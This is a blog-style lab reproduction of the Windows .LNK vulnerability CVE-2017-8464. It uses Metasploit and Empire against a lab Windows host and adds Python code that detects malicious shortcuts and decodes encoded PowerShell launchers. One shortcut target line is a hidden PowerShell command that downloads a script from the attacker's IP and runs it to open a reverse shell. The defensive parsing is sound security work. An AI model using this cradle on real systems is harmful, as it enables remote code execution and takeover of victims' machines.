[Shell] CVE-2017-8464 vulnerability reproduction

0x01 Vulnerability principle

When Windows parses a file with the .LNK extension, it resolves the binary the shortcut references. If malicious binary code is recognised and executed by the system during this process, remote code execution is achieved. Because the parsing runs inside the explorer.exe process, the code loaded into memory has the same rights as the current user.

An attacker can therefore abuse this parsing process: the malicious binary code is placed on a removable drive (or on a remote share), and once the victim's system parses the .LNK file via PowerShell, the machine is under the attacker's control.

An attacker who successfully exploits this vulnerability gains the same user rights as the local user.

0x02 Affected versions

Windows 7 (32/64-bit)
Windows 8 (32/64-bit)
Windows 8.1 (32/64-bit)
Windows 10 (32/64-bit, RTM/TH2/RS1/RS2)
Windows Server 2008 (32/64-bit/IA64)
Windows Server 2008 R2 (64-bit/IA64)
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
Windows Vista

0x03 Exploit 1

Use Metasploit to exploit the vulnerability on the target host. The multi/handler listener module is selected, and the shell it receives is used.

First, prepare the environment for reproducing CVE-2017-8464: a Kali virtual machine and a Windows Server 2008 machine.

Attacker: Kali, IP 192.168.137.133

Target: Windows Server 2008, IP 192.168.137.132

3.1 Open a Kali terminal and generate a PowerShell file

3.2 Move the generated file into the /var/www/html directory

3.3 Start the Apache service

3.4 Try to access the file from a browser

3.5 The file is reachable, so start MSF, select the multi/handler listener module, and configure the corresponding options

3.6 Start listening

3.7 Switch to Windows Server 2008 and create a shortcut

Enter the constructed path here as the shortcut target:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.137.133/1.ps1');test.ps1"

3.8 Click Next, then Finish; a PowerShell shortcut is generated

3.9 Double-click the shortcut to run it. Because the shell comes back within seconds of the double-click, no screenshot was taken of this step. Switch back to the Kali virtual machine: a shell has been returned.
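The shortcut built in step 3.7 carries the whole PowerShell download cradle in its COMMAND_LINE_ARGUMENTS string, so a defender can find such files by parsing the .lnk structure rather than running it. The following is an added example, not code from the original post: it walks the MS-SHLLINK layout (header, LinkTargetIDList, LinkInfo, StringData) far enough to read the arguments and flags the hidden-window, execution-policy-bypass and DownloadString/IEX markers from the command above. The shortcut bytes it examines are constructed by build_sample_lnk(), using the argument string from the post; the marker list and the helper names are assumptions of this example.

```python
"""Static triage of a Windows .lnk shortcut (added example; not code from the
original post). It parses the MS-SHLLINK layout as far as the StringData section,
pulls out COMMAND_LINE_ARGUMENTS, and flags the hidden-window, policy-bypass and
download-cradle markers seen in the shortcut the post constructs. The shortcut
bytes are built by build_sample_lnk() here, not captured from a real host."""
import re
import struct

# LinkFlags bits from the ShellLinkHeader (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7          # ShowCommand value that keeps the window out of sight

# {00021401-0000-0000-C000-000000000046} in its on-disk (little-endian) layout
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# StringData entries appear in this fixed order, each present only if its flag is set
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Markers taken from the command line the post types into the shortcut target
MARKERS = (
    (re.compile(r"-(?:w|windowstyle)\s+hidden", re.I), "console window hidden"),
    (re.compile(r"-(?:exec|ep|executionpolicy)\s+bypass", re.I), "execution policy bypassed"),
    (re.compile(r"downloadstring\s*\(", re.I), "script fetched from a remote URL"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "fetched text passed to Invoke-Expression"),
)


def parse_lnk(data: bytes) -> dict:
    """Return the header flags, ShowCommand and StringData strings of a .lnk."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"link_flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize (2 bytes) + the item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        if len(raw) != count * width:
            raise ValueError(f"truncated {name} string")
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
        pos += count * width
    return fields


def triage(fields: dict) -> dict:
    """Score a parsed shortcut; only PowerShell targets are examined."""
    text = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
    reasons = []
    if "powershell" in text.lower():
        reasons = [why for pattern, why in MARKERS if pattern.search(text)]
        if fields["show_command"] == SW_SHOWMINNOACTIVE:
            reasons.append("ShowCommand set to SW_SHOWMINNOACTIVE")
    return {"suspicious": bool(reasons), "reasons": reasons}


def build_sample_lnk(arguments: str, show_command: int = 1) -> bytes:
    """Constructed sample: a minimal Unicode .lnk with an empty ID list,
    a relative path to powershell.exe and the given arguments."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIqqqIiIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    id_list = struct.pack("<H", 2) + b"\x00\x00"   # only the TerminalID

    def sd(s: str) -> bytes:                       # CountCharacters + UTF-16LE text
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + id_list + sd(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") + sd(arguments)


# The argument string the post pastes into the shortcut's target field
SAMPLE_ARGS = ('-windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient)'
               ".DownloadString('http://192.168.137.133/1.ps1');test.ps1\"")


if __name__ == "__main__":
    for args, show in ((SAMPLE_ARGS, SW_SHOWMINNOACTIVE), ("-NoProfile -File report.ps1", 1)):
        verdict = triage(parse_lnk(build_sample_lnk(args, show)))
        print(verdict["suspicious"], verdict["reasons"])
```

To apply this to real files, replace build_sample_lnk() with the bytes of each .lnk found on removable media or in a user's Startup folder; shortcuts whose target resolves to powershell.exe and whose arguments carry a download cradle are the ones worth a closer look, while an empty reasons list on a PowerShell target is what a legitimate administrative shortcut normally produces.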

0x04 Exploit 2

4.1 Attack a Windows 10 system with the Empire tool, as shown below:

4.2 Here you will find that the Empire tool and msf look quite similar.

Then use a script that Windows can recognise: it generates a .bat file, which is immediately stored in /tmp:

4.3 Opening the .bat script in Notepad shows the malicious binary code, base64-encoded:

4.4 Name this file launcher.bat and run it on Windows, then go back to the listening port: the target host is already online:

4.5 In this way, the current user's privileges on Windows are obtained:
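The base64 blob seen in step 4.3 is not encryption: a PowerShell -EncodedCommand argument is plain base64 over the UTF-16LE text of the script, so the launcher can be read back with no key. The following is an added example, not code from the post or from Empire: it finds the encoded argument on each powershell line of a .bat file, decodes it, and notes which download-cradle verbs the recovered script uses. The launcher text it decodes is constructed by build_sample_bat() around a placeholder URL (example.invalid); it is not the launcher.bat the post shows, and the abbreviation list and helper names are assumptions of this example.

```python
"""Recovering the script inside a PowerShell -EncodedCommand launcher (added
example; not code from the post or from Empire). The launcher text is
constructed by build_sample_bat() with a placeholder URL; it is not the
launcher.bat the post shows."""
import base64
import binascii
import re
from typing import Optional

# Abbreviations powershell.exe accepts for -EncodedCommand, followed by the base64 text
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Verbs that fetch or evaluate remote content inside the decoded script
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by -EncodedCommand, None if the line has none.

    Raises ValueError when the argument is present but is not base64 over UTF-16LE,
    which is itself worth noting during triage."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"encoded argument is not base64/UTF-16LE: {exc}") from exc


def triage_bat(text: str) -> list:
    """Decode every encoded PowerShell launcher line in a .bat and list cradle verbs."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if "powershell" not in line.lower():
            continue
        script = decode_encoded_command(line)
        if script is None:
            continue
        verbs = sorted({m.group(0).lower() for m in CRADLE.finditer(script)})
        findings.append({"line": lineno, "script": script, "cradle": verbs})
    return findings


def build_sample_bat(script: str) -> str:
    """Constructed sample in the shape of an encoded launcher .bat (not Empire's output)."""
    encoded = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return "@echo off\r\n" + f"start /b powershell -NoP -NonI -W Hidden -Enc {encoded}\r\n"


# Constructed download cradle with a placeholder host; same shape as the post's command
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/launcher.ps1')"


if __name__ == "__main__":
    for finding in triage_bat(build_sample_bat(SAMPLE_SCRIPT)):
        print(f"line {finding['line']}: cradle verbs {finding['cradle']}")
        print("  decoded:", finding["script"])
```

The same decoder applies to process-creation logs (Sysmon Event ID 1, Security 4688 with command-line auditing enabled), where the encoded argument appears in the CommandLine field; decoding it there is usually the quickest way to tell a benign scheduled script from a stager.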

0x05 Reference links

1. CVE-2017-8464 vulnerability reproduction

2. "Stuxnet third generation": reproducing CVE-2017-8464 with PowerShell


Source: www.cnblogs.com/-mo-/p/11442815.html